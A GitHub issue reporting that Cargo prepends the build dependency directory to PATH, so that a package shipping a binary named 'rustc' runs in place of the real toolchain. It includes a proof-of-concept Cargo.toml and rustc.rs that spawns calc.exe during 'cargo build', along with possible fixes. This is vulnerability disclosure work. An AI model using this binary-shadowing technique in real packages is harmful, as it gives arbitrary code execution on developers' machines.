You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
When cargo builds a package, it adds the dependency directory to the front of the PATH environment variable.
As a result, the malicious package's modified executable is resolved and executed before toolchain executables such as rustc or cc.
This means that a malicious package may lead to arbitrary code execution.
Additionally, while CVE-2024-24787 modifies path resolution by directly changing linker flags, Cargo does not require that.
Steps
Configure malicious package.
rustc.rs
use std::process::Command;fnmain(){let _test = Command::new("C:\\\\Windows\\\\System32\\\\calc.exe").spawn();}
main.rs
mod rustc;
fn main() {
println!("Hello, world!");
}
Cargo.toml
[package]
name = "poc"version = "0.1.0"edition = "2021"# See more keys and their definitions at <https://doc.rust-lang.org/cargo/reference/manifest.html>
[dependencies]
cc = "1.0.94"# for waiting to malicious program
[[bin]]
name = "rustc"path = "src/rustc.rs"
[[bin]]
name = "test"path = "src/test.rs"
Place the build/deps directory at the end of PATH.
The Security team says that break legitimate functionality that expects local libraries to be considered before system libraries. However, it is questionable whether there are cases where local libraries should be considered first.
Register a blacklist to prevent building with the executable name of the toolchain used by Rust.
Notes
I reported this bug to the Rust Security Response WG, but it was not treated as a security vulnerability.
Problem
When cargo builds a package, it adds the dependency directory to the front of the PATH environment variable.
As a result, the malicious package's modified executable is resolved and executed before toolchain executables such as rustc or cc.
This means that a malicious package may lead to arbitrary code execution.
This appears to be a similar issue to CVE-2024-24787(https://pkg.go.dev/vuln/GO-2024-2825), which was recently discovered in Golang.
However, this bug affects all operating systems, not just Darwin.
Additionally, while CVE-2024-24787 modifies path resolution by directly changing linker flags, Cargo does not require that.
Steps
Running
cargo build
executes arbitrary code.poc.mp4
https://drive.google.com/file/d/1wnK9YxAeI6HwLXSVp5k7eN-EvtD9hMa8/view?usp=sharing
Possible Solution(s)
Notes
I reported this bug to the Rust Security Response WG, but it was not treated as a security vulnerability.
Version
The text was updated successfully, but these errors were encountered: